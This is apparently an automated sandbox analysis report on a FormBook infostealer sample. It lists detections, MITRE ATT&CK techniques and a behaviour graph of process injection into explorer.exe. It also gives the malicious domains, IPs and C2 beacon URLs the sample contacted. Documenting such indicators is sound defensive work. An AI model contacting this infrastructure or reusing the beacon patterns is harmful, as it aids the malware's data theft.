          Source: explorer.exe, 00000004.00000000.543688861.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.476319624.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.461391564.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeQueries volume information: C:\Users\user\Desktop\gZU26RjMUU.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception812
          Process Injection          		11
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory121
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials112
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Rundll32          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job3
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 639420 Sample: gZU26RjMUU Startdate: 05/06/2022 Architecture: WINDOWS Score: 100 32 www.tellgalpy.com 2->32 34 tellgalpy.com 2->34 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 7 other signatures 2->50 11 gZU26RjMUU.exe 1 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\gZU26RjMUU.exe.log, ASCII 11->30 dropped 64 Writes to foreign memory regions 11->64 66 Allocates memory in foreign processes 11->66 68 Injects a PE file into a foreign processes 11->68 15 cvtres.exe 11->15         started        signatures6 process7 signatures8 70 Modifies the context of a thread in another process (thread injection) 15->70 72 Maps a DLL or memory area into another process 15->72 74 Sample uses process hollowing technique 15->74 76 2 other signatures 15->76 18 explorer.exe 15->18 injected process9 dnsIp10 36 tubesing.com 162.241.253.231, 49854, 80 UNIFIEDLAYER-AS-1US United States 18->36 38 www.mentalnayaarifmetika.online 185.68.16.179, 49941, 80 UKRAINE-ASUA Ukraine 18->38 40 27 other IPs or domains 18->40 52 System process connects to network (likely due to code injection or exploit) 18->52 54 Performs DNS queries to domains with low reputation 18->54 22 rundll32.exe 12 18->22         started        signatures11 process12 dnsIp13 42 www.mftie.com 22->42 56 System process connects to network (likely due to code injection or exploit) 22->56 58 Modifies the context of a thread in another process (thread injection) 22->58 60 Maps a DLL or memory area into another process 22->60 62 Tries to detect virtualization through RDTSC time measurements 22->62 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          gZU26RjMUU.exe62%VirustotalBrowse
          gZU26RjMUU.exe23%MetadefenderBrowse
          gZU26RjMUU.exe77%ReversingLabsByteCode-MSIL.Trojan.Cerbu
          gZU26RjMUU.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.cvtres.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.cvtres.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.cvtres.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.gZU26RjMUU.exe.810000.0.unpack100%AviraHEUR/AGEN.1236262Download File
          0.2.gZU26RjMUU.exe.810000.0.unpack100%AviraHEUR/AGEN.1236262Download File
          3.0.cvtres.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          ageofcryptos.com10%VirustotalBrowse
          nagpurmandarin.com13%VirustotalBrowse
          tubesing.com10%VirustotalBrowse
          14offresimportantes.com11%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.american-atlantic.net/ocgr/?1bEX=RCN0VIpNVc3o/0Xt/AQqQ/q9rwjWgBzqDKIEKCgy7ZwX9axoT0DyuUXrxj1X0+Rk7knz&8p=qVwdVxLX0100%Avira URL Cloudmalware
          http://ocsp.entrust.net050%URL Reputationsafe
          http://www.mentalnayaarifmetika.online/ocgr/?1bEX=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&8p=qVwdVxLX0100%Avira URL Cloudmalware
          https://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/0%Avira URL Cloudsafe
          http://www.skb-cabinet.com/ocgr/?1bEX=aM4AR/Ukf7mSvEjk0rZEh8zH1+Y6GAFwXtGMYQcNHcG0GsWo/Wmk7XSmVo+6tFFOpJhc&8p=qVwdVxLX0100%Avira URL Cloudmalware
          http://ocsp.entrust.net000%URL Reputationsafe
          http://www.ageofcryptos.com/ocgr/?8p=qVwdVxLX0&1bEX=/7YxqUa/79bB4G9Fxc9MRqyWJ3uHfA/Cqb47Ix/IG5ItadKvR99PpkoJqdMm4bEwSG/T0%Avira URL Cloudsafe
          http://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6p100%Avira URL Cloudmalware
          http://www.ccav11.xyz/ocgr/?1bEX=iHGDCwWI53HcfS+QocK4h8/yIB8fTb9A2eAWw2qT3wOwDe1V57PTmBmkxx0888TI8Tz7&8p=qVwdVxLX0100%Avira URL Cloudphishing
          http://www.nagpurmandarin.com/ocgr/?1bEX=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+g37Dk2fKSc&D8=x2Ml3P6p100%Avira URL Cloudmalware
          http://www.engroconnect.net/ocgr/?1bEX=ViYSIEFv5rwMZxE+N77jXoDFxfL0aS1QvzE+hdAgKT25h9AtQBwV2Ju9rwPnKArhVZH3&D8=x2Ml3P6p0%Avira URL Cloudsafe
          http://www.tahnforest.com/ocgr/?1bEX=kkcvVq01iw48hCQBW4MaTtaHwAG6gu+AbY/89EqN09znnDW7xajgziFbmfLdfE+4DaO2&8p=qVwdVxLX0100%Avira URL Cloudmalware
          www.mentalnayaarifmetika.online/ocgr/100%Avira URL Cloudmalware
          http://www.exceedrigging.online/ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYH100%Avira URL Cloudmalware
          http://www.tubesing.com/ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKx100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ageofcryptos.com
          		62.149.128.40
          		truetrueunknown
          nagpurmandarin.com
          		34.102.136.180
          		truefalseunknown
          tubesing.com
          		162.241.253.231
          		truetrueunknown
          14offresimportantes.com
          		37.187.131.150
          		truetrueunknown
          shops.myshopify.com
          		23.227.38.74
          		truetrue
            		unknown
            www.mentalnayaarifmetika.online
            		185.68.16.179
            		truetrue
              		unknown
              www.mftie.com
              		23.80.123.107
              		truetrue
                		unknown
                www.ccav11.xyz
                		35.201.101.222
                		truefalse
                  		unknown
                  www.skb-cabinet.com
                  		185.129.100.127
                  		truetrue
                    		unknown
                    american-atlantic.net
                    		15.197.142.173
                    		truetrue
                      		unknown
                      tellgalpy.com
                      		43.240.146.175
                      		truetrue
                        		unknown
                        engroconnect.net
                        		34.102.136.180
                        		truefalse
                          		unknown
                          www.exceedrigging.online
                          		203.170.80.250
                          		truetrue
                            		unknown
                            www.christineenergy.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.tubesing.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.travisjbogard.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.tellgalpy.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.american-atlantic.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.tahnforest.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.14offresimportantes.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.nagpurmandarin.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.edisson-bd.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.engroconnect.net
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.muktobangla.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.ageofcryptos.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.salahov.info
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.garglimited.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.myamazonloan.net
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.demetbatmaz.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.american-atlantic.net/ocgr/?1bEX=RCN0VIpNVc3o/0Xt/AQqQ/q9rwjWgBzqDKIEKCgy7ZwX9axoT0DyuUXrxj1X0+Rk7knz&8p=qVwdVxLX0true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.mentalnayaarifmetika.online/ocgr/?1bEX=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&8p=qVwdVxLX0true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.skb-cabinet.com/ocgr/?1bEX=aM4AR/Ukf7mSvEjk0rZEh8zH1+Y6GAFwXtGMYQcNHcG0GsWo/Wmk7XSmVo+6tFFOpJhc&8p=qVwdVxLX0true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.ageofcryptos.com/ocgr/?8p=qVwdVxLX0&1bEX=/7YxqUa/79bB4G9Fxc9MRqyWJ3uHfA/Cqb47Ix/IG5ItadKvR99PpkoJqdMm4bEwSG/Ttrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6ptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.ccav11.xyz/ocgr/?1bEX=iHGDCwWI53HcfS+QocK4h8/yIB8fTb9A2eAWw2qT3wOwDe1V57PTmBmkxx0888TI8Tz7&8p=qVwdVxLX0false
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            http://www.nagpurmandarin.com/ocgr/?1bEX=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+g37Dk2fKSc&D8=x2Ml3P6pfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.engroconnect.net/ocgr/?1bEX=ViYSIEFv5rwMZxE+N77jXoDFxfL0aS1QvzE+hdAgKT25h9AtQBwV2Ju9rwPnKArhVZH3&D8=x2Ml3P6pfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tahnforest.com/ocgr/?1bEX=kkcvVq01iw48hCQBW4MaTtaHwAG6gu+AbY/89EqN09znnDW7xajgziFbmfLdfE+4DaO2&8p=qVwdVxLX0true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            www.mentalnayaarifmetika.online/ocgr/true
                                                            • Avira URL Cloud: malware
                                                            		low
                                                            http://www.exceedrigging.online/ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYHtrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.tubesing.com/ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKxtrue
                                                            • Avira URL Cloud: malware
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            http://crl.entrust.net/g2ca.crl0;gZU26RjMUU.exefalse
                                                              		high
                                                              http://ocsp.entrust.net05gZU26RjMUU.exefalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/rundll32.exe, 0000000B.00000002.949204303.0000000004E82000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://ocsp.entrust.net00gZU26RjMUU.exefalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://crl.entrust.net/evcs1.crl0gZU26RjMUU.exefalse
                                                                		high
                                                                http://www.entrust.net/rpa0gZU26RjMUU.exefalse
                                                                  		high
                                                                  http://aia.entrust.net/evcs1-chain256.cer01gZU26RjMUU.exefalse
                                                                    		high
                                                                    https://www.entrust.net/rpa0gZU26RjMUU.exefalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      185.68.16.179
                                                                      		www.mentalnayaarifmetika.onlineUkraine
                                                                      		200000UKRAINE-ASUAtrue
                                                                      62.149.128.40
                                                                      		ageofcryptos.comItaly
                                                                      		31034ARUBA-ASNITtrue
                                                                      23.80.123.107
                                                                      		www.mftie.comUnited States
                                                                      		395954LEASEWEB-USA-LAX-11UStrue
                                                                      37.187.131.150
                                                                      		14offresimportantes.comFrance
                                                                      		16276OVHFRtrue
                                                                      15.197.142.173
                                                                      		american-atlantic.netUnited States
                                                                      		7430TANDEMUStrue
                                                                      23.227.38.74
                                                                      		shops.myshopify.comCanada
                                                                      		13335CLOUDFLARENETUStrue
                                                                      43.240.146.175
                                                                      		tellgalpy.comChina
                                                                      		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                      162.241.253.231
                                                                      		tubesing.comUnited States
                                                                      		46606UNIFIEDLAYER-AS-1UStrue
                                                                      35.201.101.222
                                                                      		www.ccav11.xyzUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      203.170.80.250
                                                                      		www.exceedrigging.onlineAustralia
                                                                      		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                      185.129.100.127
                                                                      		www.skb-cabinet.comRussian Federation
                                                                      		57724DDOS-GUARDRUtrue
                                                                      34.102.136.180
                                                                      		nagpurmandarin.comUnited States
                                                                      		15169GOOGLEUSfalse

                                                                      General Information

                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                      Analysis ID:639420
                                                                      Start date and time: 05/06/202213:03:082022-06-05 13:03:08 +02:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 38s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:gZU26RjMUU (renamed file extension from none to exe)
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:24
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/1@23/12
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:
                                                                      • Successful, ratio: 61.3% (good quality ratio 56.2%)
                                                                      • Quality average: 73.5%
                                                                      • Quality standard deviation: 30.6%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 88
                                                                      • Number of non-executed functions: 166
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Override analysis time to 240s for rundll32

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, licensing.mp.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      13:04:24API Interceptor1x Sleep call for process: gZU26RjMUU.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      185.68.16.179Eyyz1EU8ia.exeGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?V2MD_=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&hF=5jCDVFDx9hvh9
                                                                      NCVPJzfa0w.exeGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?GJB=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJiQ/3WqMw+UTaqmlRw==&Zdp8n=FHrl40h8H
                                                                      fooYgfbxno.exeGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_
                                                                      ntrebare ES220062.xlsxGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?grux=WCPK4waH25ZsH7CQ9rbcYrxYoSsYkto1Afd9Drm9jpJADNSd9KR9P7YgKEQAwGSHye81DQ==&mptdUr=6lkDMnM0E
                                                                      F3cCuwtbgc.exeGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?RDKP_=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&0ny=O0GX428p
                                                                      Pa5BQv8oni.exeGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?7nLpl=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh88rmm09fpF&mZIt=uBzpjfYp
                                                                      8x6zeIBDXJ.exeGet hashmaliciousBrowse
                                                                      • www.mentalnayaarifmetika.online/ocgr/?e2=9r3HmbL8&2dcHhxHP=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJiQ/3WqMw+UTaqmlRw==
                                                                      7UA1651581370.xlsmGet hashmaliciousBrowse
                                                                      • dajshans.org.ua/yrwn2az.rar
                                                                      62.149.128.40NEW ORDER #00980.exeGet hashmaliciousBrowse
                                                                      • www.heglem.com/hpmw/?NViP5Vq8=VyWgW6Jw2tuf6ugSkGuX1/2Te9YrWq1NHmhogpi7H4tmZrYLSi8mlJqsMA3HLNEZEU3f&9rV0d=iZPtS0Sxdh
                                                                      30801852140-9762413-PDF.exeGet hashmaliciousBrowse
                                                                      • www.portalcidadaniaitaliana.com/rbrt/?8pJHaf=Jk+RNkVemCinI4eG2Z7Nww2orya7qCLBzN2L08mdLFJOjshnZykotv5bhOpp9ZqWAbUP&xT=ETslA2rhl8ODo6
                                                                      BANKING_DETAILS.pdf.exeGet hashmaliciousBrowse
                                                                      • www.vezzigioielli.com/bur5/?5j_Hvt=PatChyDCHsOJQWlqFe+nEOSuzd/kq0HUbnbS7R8A/7QLr7fW4/C2soNu1Q42sD0J13dz&X8OlGT=gJBhn4B0j24tyjt0
                                                                      DHL DOCUMENT FOR #504.exeGet hashmaliciousBrowse
                                                                      • www.profumeriamedici.com/hno0/?nRgT2fL=jWXElg7Z8Mf/HTBFaNb5Jmu3g0ZQJz/e9qWGNGBfLBxqs0hnst92DlBlT8nR9RJE1u0f&x6bd=fdxdf
                                                                      iEBaBUkV54.exeGet hashmaliciousBrowse
                                                                      • www.profumeriamedici.com/hno0/?v4=jWXElg7Z8Mf/HTBFaNb5Jmu3g0ZQJz/e9qWGNGBfLBxqs0hnst92DlBlT8nR9RJE1u0f&YdH=5jGtphc
                                                                      order.exeGet hashmaliciousBrowse
                                                                      • www.castiglionefalletto.wine/d17y/?WRSlv=P/F+wVqoj3O1pbeCPI1+lClk1oK2CwZiLPWj40VC5TAsxnC0KFbxd1BadDKCoX3wvdOzzxeNxQ==&o2J=9roxqf9P
                                                                      UzUSWe10P9.exeGet hashmaliciousBrowse
                                                                      • www.bedandbreakfastitalia.cloud/fzsg/?9r=kaZC5rB65a3mP7IO/pxVblYzQvPQWsF6IwxL3/SV57DOI268tKsUQ8YeNGVjRrSQcfP9ZKB/qw==&z48=Ezr0NbpH
                                                                      New order-enquiry108042021.exeGet hashmaliciousBrowse
                                                                      • www.piadineriae45.com/bp39/?Yrb=BiGm5qmIOyDRXvSMgTHKvr7AyM7NtOAx1g87TzWKkmZxOjaaiYZeQMFg8WKehfVZ3bve&x4kX=gDHX0L
                                                                      Purchase order_dated 08-14-2021.exeGet hashmaliciousBrowse
                                                                      • www.piadineriae45.com/bp39/?lPU80Lv=BiGm5qmIOyDRXvSMgTHKvr7AyM7NtOAx1g87TzWKkmZxOjaaiYZeQMFg8WKehfVZ3bve&s2Mtl=Qvc40LnHM25phdV
                                                                      Payment confirmation.exeGet hashmaliciousBrowse
                                                                      • www.tortanuragica.com/iq3g/?IrK=gcJS22rHsodx8VnS+/9dCYT8ryCieDRF8tmhiX6/e5xEyVN/dSlGY2waG+U6s/0hKF5i&U0GD=nTvlUPapR
                                                                      v8kZUFgdD4.exeGet hashmaliciousBrowse
